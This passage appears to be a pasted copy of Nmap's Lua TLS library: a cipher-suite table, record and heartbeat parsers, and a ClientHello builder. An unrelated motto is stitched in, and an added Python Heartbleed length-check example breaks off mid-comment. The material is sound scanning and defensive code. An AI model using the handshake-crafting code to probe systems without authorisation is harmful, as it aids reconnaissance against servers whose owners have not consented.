  ["TLS_RSA_PSK_WITH_AES_256_CBC_SHA"] = 0x0095,
  ["TLS_RSA_WITH_SEED_CBC_SHA"] = 0x0096,
  ["TLS_DH_DSS_WITH_SEED_CBC_SHA"] = 0x0097,
  ["TLS_DH_RSA_WITH_SEED_CBC_SHA"] = 0x0098,
  ["TLS_DHE_DSS_WITH_SEED_CBC_SHA"] = 0x0099,
  ["TLS_DHE_RSA_WITH_SEED_CBC_SHA"] = 0x009A,
  ["TLS_DH_anon_WITH_SEED_CBC_SHA"] = 0x009B,
  ["TLS_RSA_WITH_AES_128_GCM_SHA256"] = 0x009C,
  ["TLS_RSA_WITH_AES_256_GCM_SHA384"] = 0x009D,
  ["TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"] = 0x009E,
  ["TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"] = 0x009F,
  ["TLS_DH_RSA_WITH_AES_128_GCM_SHA256"] = 0x00A0,
  ["TLS_DH_RSA_WITH_AES_256_GCM_SHA384"] = 0x00A1,
  ["TLS_DHE_DSS_WITH_AES_128_GCM_SHA256"] = 0x00A2,
  ["TLS_DHE_DSS_WITH_AES_256_GCM_SHA384"] = 0x00A3,
  ["TLS_DH_DSS_WITH_AES_128_GCM_SHA256"] = 0x00A4,
  ["TLS_DH_DSS_WITH_AES_256_GCM_SHA384"] = 0x00A5,
  ["TLS_DH_anon_WITH_AES_128_GCM_SHA256"] = 0x00A6,
  ["TLS_DH_anon_WITH_AES_256_GCM_SHA384"] = 0x00A7,
  ["TLS_PSK_WITH_AES_128_GCM_SHA256"] = 0x00A8,
  ["TLS_PSK_WITH_AES_256_GCM_SHA384"] = 0x00A9,
  ["TLS_DHE_PSK_WITH_AES_128_GCM_SHA256"] = 0x00AA,
  ["TLS_DHE_PSK_WITH_AES_256_GCM_SHA384"] = 0x00AB,
  ["TLS_RSA_PSK_WITH_AES_128_GCM_SHA256"] = 0x00AC,
  ["TLS_RSA_PSK_WITH_AES_256_GCM_SHA384"] = 0x00AD,
  ["TLS_PSK_WITH_AES_128_CBC_SHA256"] = 0x00AE,
  ["TLS_PSK_WITH_AES_256_CBC_SHA384"] = 0x00AF,
  ["TLS_PSK_WITH_NULL_SHA256"] = 0x00B0,
  ["TLS_PSK_WITH_NULL_SHA384"] = 0x00B1,
  ["TLS_DHE_PSK_WITH_AES_128_CBC_SHA256"] = 0x00B2,
  ["TLS_DHE_PSK_WITH_AES_256_CBC_SHA384"] = 0x00B3,
  ["TLS_DHE_PSK_WITH_NULL_SHA256"] = 0x00B4,
  ["TLS_DHE_PSK_WITH_NULL_SHA384"] = 0x00B5,
  ["TLS_RSA_PSK_WITH_AES_128_CBC_SHA256"] = 0x00B6,
  ["TLS_RSA_PSK_WITH_AES_256_CBC_SHA384"] = 0x00B7,
  ["TLS_RSA_PSK_WITH_NULL_SHA256"] = 0x00B8,
  ["TLS_RSA_PSK_WITH_NULL_SHA384"] = 0x00B9,
  ["TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BA,
  ["TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BB,
  ["TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BC,
  ["TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BD,
  ["TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BE,
  ["TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256"] = 0x00BF,
  ["TLS_EMPTY_RENEGOTIATION_INFO_SCSV"] = 0x00FF,
  ["TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C0,
  ["TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C1,
  ["TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C2,
  ["TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C3,
  ["TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C4,
  ["TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256"] = 0x00C5,
  ["TLS_ECDH_ECDSA_WITH_NULL_SHA"] = 0xC001,
  ["TLS_ECDH_ECDSA_WITH_RC4_128_SHA"] = 0xC002,
  ["TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA"] = 0xC003,
  ["TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA"] = 0xC004,
  ["TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA"] = 0xC005,
  ["TLS_ECDHE_ECDSA_WITH_NULL_SHA"] = 0xC006,
  ["TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"] = 0xC007,
  ["TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA"] = 0xC008,
  ["TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA"] = 0xC009,
  ["TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA"] = 0xC00A,
  ["TLS_ECDH_RSA_WITH_NULL_SHA"] = 0xC00B,
  ["TLS_ECDH_RSA_WITH_RC4_128_SHA"] = 0xC00C,
  ["TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA"] = 0xC00D,
  ["TLS_ECDH_RSA_WITH_AES_128_CBC_SHA"] = 0xC00E,
  ["TLS_ECDH_RSA_WITH_AES_256_CBC_SHA"] = 0xC00F,
  ["TLS_ECDHE_RSA_WITH_NULL_SHA"] = 0xC010,
  ["TLS_ECDHE_RSA_WITH_RC4_128_SHA"] = 0xC011,
  ["TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA"] = 0xC012,
  ["TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"] = 0xC013,
  ["TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"] = 0xC014,
  ["TLS_ECDH_anon_WITH_NULL_SHA"] = 0xC015,
  ["TLS_ECDH_anon_WITH_RC4_128_SHA"] = 0xC016,
  ["TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA"] = 0xC017,
  ["TLS_ECDH_anon_WITH_AES_128_CBC_SHA"] = 0xC018,
  ["TLS_ECDH_anon_WITH_AES_256_CBC_SHA"] = 0xC019,
  ["TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA"] = 0xC01A,
  ["TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA"] = 0xC01B,
  ["TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA"] = 0xC01C,
  ["TLS_SRP_SHA_WITH_AES_128_CBC_SHA"] = 0xC01D,
  ["TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA"] = 0xC01E,
  ["TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA"] = 0xC01F,
  ["TLS_SRP_SHA_WITH_AES_256_CBC_SHA"] = 0xC020,
  ["TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA"] = 0xC021,
  ["TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA"] = 0xC022,
  ["TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256"] = 0xC023,
  ["TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384"] = 0xC024,
  ["TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256"] = 0xC025,
  ["TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384"] = 0xC026,
  ["TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256"] = 0xC027,
  ["TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384"] = 0xC028,
  ["TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256"] = 0xC029,
  ["TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384"] = 0xC02A,
  ["TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"] = 0xC02B,
  ["TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"] = 0xC02C,
  ["TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256"] = 0xC02D,
  ["TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384"] = 0xC02E,
  ["TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"] = 0xC02F,
  ["TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"] = 0xC030,
  ["TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256"] = 0xC031,
  ["TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384"] = 0xC032,
  ["TLS_ECDHE_PSK_WITH_RC4_128_SHA"] = 0xC033,
  ["TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA"] = 0xC034,
  ["TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA"] = 0xC035,
  ["TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA"] = 0xC036,
  ["TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256"] = 0xC037,
  ["TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384"] = 0xC038,
  ["TLS_ECDHE_PSK_WITH_NULL_SHA"] = 0xC039,
  ["TLS_ECDHE_PSK_WITH_NULL_SHA256"] = 0xC03A,
  ["TLS_ECDHE_PSK_WITH_NULL_SHA384"] = 0xC03B,
  ["TLS_RSA_WITH_ARIA_128_CBC_SHA256"] = 0xC03C,
  ["TLS_RSA_WITH_ARIA_256_CBC_SHA384"] = 0xC03D,
  ["TLS_DH_DSS_WITH_ARIA_128_CBC_SHA256"] = 0xC03E,
  ["TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384"] = 0xC03F,
  ["TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256"] = 0xC040,
  ["TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384"] = 0xC041,
  ["TLS_DHE_DSS_WITH_ARIA_128_CBC_SHA256"] = 0xC042,
  ["TLS_DHE_DSS_WITH_ARIA_256_CBC_SHA384"] = 0xC043,
  ["TLS_DHE_RSA_WITH_ARIA_128_CBC_SHA256"] = 0xC044,
  ["TLS_DHE_RSA_WITH_ARIA_256_CBC_SHA384"] = 0xC045,
  ["TLS_DH_anon_WITH_ARIA_128_CBC_SHA256"] = 0xC046,
  ["TLS_DH_anon_WITH_ARIA_256_CBC_SHA384"] = 0xC047,
  ["TLS_ECDHE_ECDSA_WITH_ARIA_128_CBC_SHA256"] = 0xC048,
  ["TLS_ECDHE_ECDSA_WITH_ARIA_256_CBC_SHA384"] = 0xC049,
  ["TLS_ECDH_ECDSA_WITH_ARIA_128_CBC_SHA256"] = 0xC04A,
  800. ["TLS_ECDH_ECDSA_WITH_ARIA_256_CBC_SHA384"] = 0xC04B,
  801. ["TLS_ECDHE_RSA_WITH_ARIA_128_CBC_SHA256"] = 0xC04C,
  802. ["TLS_ECDHE_RSA_WITH_ARIA_256_CBC_SHA384"] = 0xC04D,
  803. ["TLS_ECDH_RSA_WITH_ARIA_128_CBC_SHA256"] = 0xC04E,
  804. ["TLS_ECDH_RSA_WITH_ARIA_256_CBC_SHA384"] = 0xC04F,
  805. ["TLS_RSA_WITH_ARIA_128_GCM_SHA256"] = 0xC050,
  806. ["TLS_RSA_WITH_ARIA_256_GCM_SHA384"] = 0xC051,
  807. ["TLS_DHE_RSA_WITH_ARIA_128_GCM_SHA256"] = 0xC052,
  808. ["TLS_DHE_RSA_WITH_ARIA_256_GCM_SHA384"] = 0xC053,
  809. ["TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256"] = 0xC054,
  810. ["TLS_DH_RSA_WITH_ARIA_256_GCM_SHA384"] = 0xC055,
  811. ["TLS_DHE_DSS_WITH_ARIA_128_GCM_SHA256"] = 0xC056,
  812. ["TLS_DHE_DSS_WITH_ARIA_256_GCM_SHA384"] = 0xC057,
  813. ["TLS_DH_DSS_WITH_ARIA_128_GCM_SHA256"] = 0xC058,
  814. ["TLS_DH_DSS_WITH_ARIA_256_GCM_SHA384"] = 0xC059,
  815. ["TLS_DH_anon_WITH_ARIA_128_GCM_SHA256"] = 0xC05A,
  816. ["TLS_DH_anon_WITH_ARIA_256_GCM_SHA384"] = 0xC05B,
  817. ["TLS_ECDHE_ECDSA_WITH_ARIA_128_GCM_SHA256"] = 0xC05C,
  818. ["TLS_ECDHE_ECDSA_WITH_ARIA_256_GCM_SHA384"] = 0xC05D,
  819. ["TLS_ECDH_ECDSA_WITH_ARIA_128_GCM_SHA256"] = 0xC05E,
  820. ["TLS_ECDH_ECDSA_WITH_ARIA_256_GCM_SHA384"] = 0xC05F,
  821. ["TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256"] = 0xC060,
  822. ["TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384"] = 0xC061,
  823. ["TLS_ECDH_RSA_WITH_ARIA_128_GCM_SHA256"] = 0xC062,
  824. ["TLS_ECDH_RSA_WITH_ARIA_256_GCM_SHA384"] = 0xC063,
  825. ["TLS_PSK_WITH_ARIA_128_CBC_SHA256"] = 0xC064,
  826. ["TLS_PSK_WITH_ARIA_256_CBC_SHA384"] = 0xC065,
  827. ["TLS_DHE_PSK_WITH_ARIA_128_CBC_SHA256"] = 0xC066,
  828. ["TLS_DHE_PSK_WITH_ARIA_256_CBC_SHA384"] = 0xC067,
  829. ["TLS_RSA_PSK_WITH_ARIA_128_CBC_SHA256"] = 0xC068,
  830. ["TLS_RSA_PSK_WITH_ARIA_256_CBC_SHA384"] = 0xC069,
  831. ["TLS_PSK_WITH_ARIA_128_GCM_SHA256"] = 0xC06A,
  832. ["TLS_PSK_WITH_ARIA_256_GCM_SHA384"] = 0xC06B,
  833. ["TLS_DHE_PSK_WITH_ARIA_128_GCM_SHA256"] = 0xC06C,
  834. ["TLS_DHE_PSK_WITH_ARIA_256_GCM_SHA384"] = 0xC06D,
  835. ["TLS_RSA_PSK_WITH_ARIA_128_GCM_SHA256"] = 0xC06E,
  836. ["TLS_RSA_PSK_WITH_ARIA_256_GCM_SHA384"] = 0xC06F,
  837. ["TLS_ECDHE_PSK_WITH_ARIA_128_CBC_SHA256"] = 0xC070,
  838. ["TLS_ECDHE_PSK_WITH_ARIA_256_CBC_SHA384"] = 0xC071,
  839. ["TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC072,
  840. ["TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC073,
  841. ["TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC074,
  842. ["TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC075,
  843. ["TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC076,
  844. ["TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC077,
  845. ["TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC078,
  846. ["TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC079,
  847. ["TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC07A,
  848. ["TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC07B,
  849. ["TLS_DHE_RSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC07C,
  850. ["TLS_DHE_RSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC07D,
  851. ["TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC07E,
  852. ["TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC07F,
  853. ["TLS_DHE_DSS_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC080,
  854. ["TLS_DHE_DSS_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC081,
  855. ["TLS_DH_DSS_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC082,
  856. ["TLS_DH_DSS_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC083,
  857. ["TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC084,
  858. ["TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC085,
  859. ["TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC086,
  860. ["TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC087,
  861. ["TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC088,
  862. ["TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC089,
  863. ["TLS_ECDHE_RSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC08A,
  864. ["TLS_ECDHE_RSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC08B,
  865. ["TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC08C,
  866. ["TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC08D,
  867. ["TLS_PSK_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC08E,
  868. ["TLS_PSK_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC08F,
  869. ["TLS_DHE_PSK_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC090,
  870. ["TLS_DHE_PSK_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC091,
  871. ["TLS_RSA_PSK_WITH_CAMELLIA_128_GCM_SHA256"] = 0xC092,
  872. ["TLS_RSA_PSK_WITH_CAMELLIA_256_GCM_SHA384"] = 0xC093,
  873. ["TLS_PSK_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC094,
  874. ["TLS_PSK_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC095,
  875. ["TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC096,
  876. ["TLS_DHE_PSK_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC097,
  877. ["TLS_RSA_PSK_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC098,
  878. ["TLS_RSA_PSK_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC099,
  879. ["TLS_ECDHE_PSK_WITH_CAMELLIA_128_CBC_SHA256"] = 0xC09A,
  880. ["TLS_ECDHE_PSK_WITH_CAMELLIA_256_CBC_SHA384"] = 0xC09B,
  881. ["TLS_RSA_WITH_AES_128_CCM"] = 0xC09C,
  882. ["TLS_RSA_WITH_AES_256_CCM"] = 0xC09D,
  883. ["TLS_DHE_RSA_WITH_AES_128_CCM"] = 0xC09E,
  884. ["TLS_DHE_RSA_WITH_AES_256_CCM"] = 0xC09F,
  885. ["TLS_RSA_WITH_AES_128_CCM_8"] = 0xC0A0,
  886. ["TLS_RSA_WITH_AES_256_CCM_8"] = 0xC0A1,
  887. ["TLS_DHE_RSA_WITH_AES_128_CCM_8"] = 0xC0A2,
  888. ["TLS_DHE_RSA_WITH_AES_256_CCM_8"] = 0xC0A3,
  889. ["TLS_PSK_WITH_AES_128_CCM"] = 0xC0A4,
  890. ["TLS_PSK_WITH_AES_256_CCM"] = 0xC0A5,
  891. ["TLS_DHE_PSK_WITH_AES_128_CCM"] = 0xC0A6,
  892. ["TLS_DHE_PSK_WITH_AES_256_CCM"] = 0xC0A7,
  893. ["TLS_PSK_WITH_AES_128_CCM_8"] = 0xC0A8,
  894. ["TLS_PSK_WITH_AES_256_CCM_8"] = 0xC0A9,
  895. ["TLS_PSK_DHE_WITH_AES_128_CCM_8"] = 0xC0AA,
  896. ["TLS_PSK_DHE_WITH_AES_256_CCM_8"] = 0xC0AB,
  897. ["TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256"] = 0xCC13,
  898. ["TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"] = 0xCC14,
  899. ["TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256"] = 0xCC15,
  900. ["SSL_RSA_FIPS_WITH_DES_CBC_SHA"] = 0xFEFE,
  901. ["SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"] = 0xFEFF,
  902. }
  903.  
local function find_key(t, value)
  local k, v

  for k, v in pairs(t) do
    if v == value then
      return k
    end
  end

  return nil
end

---
-- Read a SSL/TLS record
-- @param buffer The read buffer
-- @param i The position in the buffer to start reading
-- @return The current position in the buffer
-- @return The record that was read, as a table
function record_read(buffer, i)
  local b, h, j, len

  ------------
  -- Header --
  ------------

  -- Ensure we have enough data for the header.
  if #buffer - i < TLS_RECORD_HEADER_LENGTH then
    return i, nil
  end

  -- Parse header.
  h = {}
  j, h["type"] = bin.unpack("C", buffer, i)
  j, h["protocol"] = bin.unpack(">S", buffer, j)
  j, h["length"] = bin.unpack(">S", buffer, j)

  -- Ensure we have enough data for the body.
  len = j + h["length"] - 1
  if #buffer < len then
    return i, nil
  end

  -- Convert to human-readable form.
  h["type"] = find_key(TLS_CONTENTTYPE_REGISTRY, h["type"])
  h["protocol"] = find_key(PROTOCOLS, h["protocol"])

  ----------
  -- Body --
  ----------

  h["body"] = {}
  while j < len do
    -- RFC 2246, 6.2.1 "multiple client messages of the same ContentType may
    -- be coalesced into a single TLSPlaintext record"
    -- TODO: implement reading of fragmented records
    b = {}
    table.insert(h["body"], b)
    if h["type"] == "alert" then
      -- Parse body.
      j, b["level"] = bin.unpack("C", buffer, j)
      j, b["description"] = bin.unpack("C", buffer, j)

      -- Convert to human-readable form.
      b["level"] = find_key(TLS_ALERT_LEVELS, b["level"])
      b["description"] = find_key(TLS_ALERT_REGISTRY, b["description"])
    elseif h["type"] == "handshake" then
      -- Parse body.
      j, b["type"] = bin.unpack("C", buffer, j)
      local blen, blen_upper
      j, blen_upper, blen = bin.unpack("C>S", buffer, j)
      blen = blen + blen_upper * 0x10000
      local msg_end = j + blen

      -- Convert to human-readable form.
      b["type"] = find_key(TLS_HANDSHAKETYPE_REGISTRY, b["type"])

      if b["type"] == "server_hello" then
        -- Parse body.
        j, b["protocol"] = bin.unpack(">S", buffer, j)
        j, b["time"] = bin.unpack(">I", buffer, j)
        j, b["random"] = bin.unpack("A28", buffer, j)
        j, b["session_id_length"] = bin.unpack("C", buffer, j)
        j, b["session_id"] = bin.unpack("A" .. b["session_id_length"], buffer, j)
        j, b["cipher"] = bin.unpack(">S", buffer, j)
        j, b["compressor"] = bin.unpack("C", buffer, j)
        -- Optional extensions for TLS only
        if j < msg_end and h["protocol"] ~= "SSLv3" then
          local num_exts
          b["extensions"] = {}
          j, num_exts = bin.unpack(">S", buffer, j)
          for e = 0, num_exts do
            if j >= msg_end then break end
            local extcode, datalen
            j, extcode = bin.unpack(">S", buffer, j)
            extcode = find_key(EXTENSIONS, extcode) or extcode
            j, b["extensions"][extcode] = bin.unpack(">P", buffer, j)
          end
        end

        -- Convert to human-readable form.
        b["protocol"] = find_key(PROTOCOLS, b["protocol"])
        b["cipher"] = find_key(CIPHERS, b["cipher"])
        b["compressor"] = find_key(COMPRESSORS, b["compressor"])
      else
        -- TODO: implement other handshake message types
        stdnse.print_debug(2, "Unknown handshake message type: %s", b["type"])
        j = msg_end
      end
    elseif h["type"] == "heartbeat" then
      j, b["type"], b["payload_length"] = bin.unpack("C>S", buffer, j)
      j, b["payload"], b["padding"] = bin.unpack("PP", buffer, j)
    else
      stdnse.print_debug("Unknown message type: %s", h["type"])
      -- Nothing above advanced j for this record type, so stop here
      -- instead of looping forever on the same position.
      break
    end
  end

  -- Ignore unparsed bytes.
  j = len+1

  return j, h
end

---
-- Build a SSL/TLS record
-- @param type The type of record ("handshake", "change_cipher_spec", etc.)
-- @param protocol The protocol and version ("SSLv3", "TLSv1.0", etc.)
-- @param b The record body
-- @return The SSL/TLS record as a string
function record_write(type, protocol, b)
  return table.concat({
    -- Set the content type of the record.
    bin.pack("C", TLS_CONTENTTYPE_REGISTRY[type]),
    -- Set the protocol.
    bin.pack(">S", PROTOCOLS[protocol]),
    -- Set the length of the record body.
    bin.pack(">S", #b),
    b
  })
end

---
-- Build a client_hello message
--
-- The options table has the following keys:
-- * <code>"protocol"</code> - The TLS protocol version string
-- * <code>"ciphers"</code> - a table containing the cipher suite names. Defaults to the NULL cipher
-- * <code>"compressors"</code> - a table containing the compressor names. Default: NULL
-- * <code>"extensions"</code> - a table containing the extension names. Default: no extensions
-- @param t Table of options
-- @return The client_hello record as a string
function client_hello(t)
  local b, ciphers, compressor, compressors, h, len

  ----------
  -- Body --
  ----------

  b = {}
  -- Set the protocol.
  table.insert(b, bin.pack(">S", PROTOCOLS[t["protocol"]]))

  -- Set the timestamp (the first 4 bytes of the Random field).
  table.insert(b, bin.pack(">I", os.time()))

  -- Set the random data (the remaining 28 bytes of the Random field).
  table.insert(b, stdnse.generate_random_string(28))

  -- Set the session ID.
  table.insert(b, bin.pack("C", 0))

  -- Cipher suites.
  ciphers = {}
  if t["ciphers"] ~= nil then
    -- Add specified ciphers.
    for _, cipher in pairs(t["ciphers"]) do
      table.insert(ciphers, bin.pack(">S", CIPHERS[cipher]))
    end
  else
    -- Use NULL cipher
    table.insert(ciphers, bin.pack(">S", CIPHERS["TLS_NULL_WITH_NULL_NULL"]))
  end
  table.insert(b, bin.pack(">P", table.concat(ciphers)))

  -- Compression methods.
  compressors = {}
  if t["compressors"] ~= nil then
    -- Add specified compressors.
    for _, compressor in pairs(t["compressors"]) do
      if compressor ~= "NULL" then
        table.insert(compressors, bin.pack("C", COMPRESSORS[compressor]))
      end
    end
  end
  -- Always include NULL as last choice
  table.insert(compressors, bin.pack("C", COMPRESSORS["NULL"]))
  table.insert(b, bin.pack(">p", table.concat(compressors)))

  -- TLS extensions
  if PROTOCOLS[t["protocol"]] and
      PROTOCOLS[t["protocol"]] ~= PROTOCOLS["SSLv3"] then
    local extensions = {}
    if t["extensions"] ~= nil then
      -- Add specified extensions.
      for extension, data in pairs(t["extensions"]) do
        if type(extension) == "number" then
          table.insert(extensions, bin.pack(">S", extension))
        else
          table.insert(extensions, bin.pack(">S", EXTENSIONS[extension]))
        end
        table.insert(extensions, bin.pack(">P", data))
      end
    end
    -- Extensions are optional
    if #extensions ~= 0 then
      table.insert(b, bin.pack(">P", table.concat(extensions)))
    end
  end

  ------------
  -- Header --
  ------------

  b = table.concat(b)

  h = {}

  -- Set type to ClientHello.
  table.insert(h, bin.pack("C", TLS_HANDSHAKETYPE_REGISTRY["client_hello"]))

  -- Set the length of the body.
  len = bin.pack(">I", #b)
  -- body length is 24 bits big-endian, so the 3 LSB of len
  table.insert(h, len:sub(2,4))

  table.insert(h, b)

  return record_write("handshake", t["protocol"], table.concat(h))
end

local function read_atleast(s, n)
  local buf = {}
  local count = 0
  while count < n do
    local status, data = s:receive_bytes(n - count)
    if not status then
      return status, data, table.concat(buf)
    end
    buf[#buf+1] = data
    count = count + #data
  end
  return true, table.concat(buf)
end

--- Get an entire record into a buffer
--
-- Caller is responsible for closing the socket if necessary.
-- @param sock The socket to read additional data from
-- @param buffer The string buffer holding any previously-read data
-- (default: "")
-- @param i The position in the buffer where the record should start
-- (default: 1)
-- @return status Socket status
-- @return Buffer containing at least 1 record if status is true
-- @return Error text if there was an error
function record_buffer(sock, buffer, i)
  buffer = buffer or ""
  i = i or 1
  local count = #buffer:sub(i)
  local status, resp, rem
  if count < TLS_RECORD_HEADER_LENGTH then
    status, resp, rem = read_atleast(sock, TLS_RECORD_HEADER_LENGTH - count)
    if not status then
      return false, buffer .. rem, resp
    end
    buffer = buffer .. resp
    count = count + #resp
  end
  -- ContentType, ProtocolVersion, length
  local _, _, _, len = bin.unpack(">CSS", buffer, i)
  if count < TLS_RECORD_HEADER_LENGTH + len then
    status, resp = read_atleast(sock, TLS_RECORD_HEADER_LENGTH + len - count)
    if not status then
      return false, buffer, resp
    end
    buffer = buffer .. resp
  end
  return true, buffer
end

return _ENV;
=============================================================================
Life is a game; there are no winners, no losers, and no ties.
The keys are the people you know, the people close to you, and your family.
If you decide to use the keys correctly to open the doors, you will succeed,
but if you decide to cheat, those keys will fall into oblivion and there will be no going back, ever.
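
As an added example (not part of the paste or of Nmap's tls.lua), this Python code mirrors the record-header parsing done by record_read above and applies the RFC 6520 length rule to heartbeat bodies, the bounds check that servers affected by Heartbleed did not perform. The function names and the sample bytes are constructed for illustration, and the check only applies to heartbeats seen in cleartext, since records after ChangeCipherSpec are encrypted.

```python
import struct

TLS_RECORD_HEADER_LENGTH = 5          # type(1) + version(2) + length(2)
CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert", 22: "handshake",
                 23: "application_data", 24: "heartbeat"}
HEARTBEAT_MIN_PADDING = 16            # RFC 6520 requires >= 16 padding bytes


def read_record(buffer, i=0):
    """Return (next_offset, record), or (i, None) if the record is incomplete."""
    if len(buffer) - i < TLS_RECORD_HEADER_LENGTH:
        return i, None
    ctype, version, length = struct.unpack_from(">BHH", buffer, i)
    start = i + TLS_RECORD_HEADER_LENGTH
    if len(buffer) < start + length:
        return i, None
    record = {"type": CONTENT_TYPES.get(ctype, ctype), "version": version,
              "body": buffer[start:start + length]}
    return start + length, record


def check_heartbeat(body):
    """Apply the RFC 6520 length rule to a cleartext heartbeat message."""
    if len(body) < 3:
        return "malformed"
    _hb_type, payload_length = struct.unpack_from(">BH", body, 0)
    # type(1) + payload_length(2) + payload + minimum padding must fit the record.
    if 3 + payload_length + HEARTBEAT_MIN_PADDING > len(body):
        return "length-mismatch"
    return "ok"


def scan(buffer):
    """Walk every complete record; return (type, heartbeat verdict or None)."""
    findings, i = [], 0
    while True:
        i, record = read_record(buffer, i)
        if record is None:
            return findings
        verdict = None
        if record["type"] == "heartbeat":
            verdict = check_heartbeat(record["body"])
        findings.append((record["type"], verdict))


def _record(ctype, body, version=0x0302):
    return struct.pack(">BHH", ctype, version, len(body)) + body


# Constructed sample stream (not captured traffic): an alert, a well-formed
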